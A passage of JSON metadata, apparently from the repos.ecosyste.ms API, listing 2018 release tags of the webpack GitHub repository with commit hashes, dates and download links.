url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v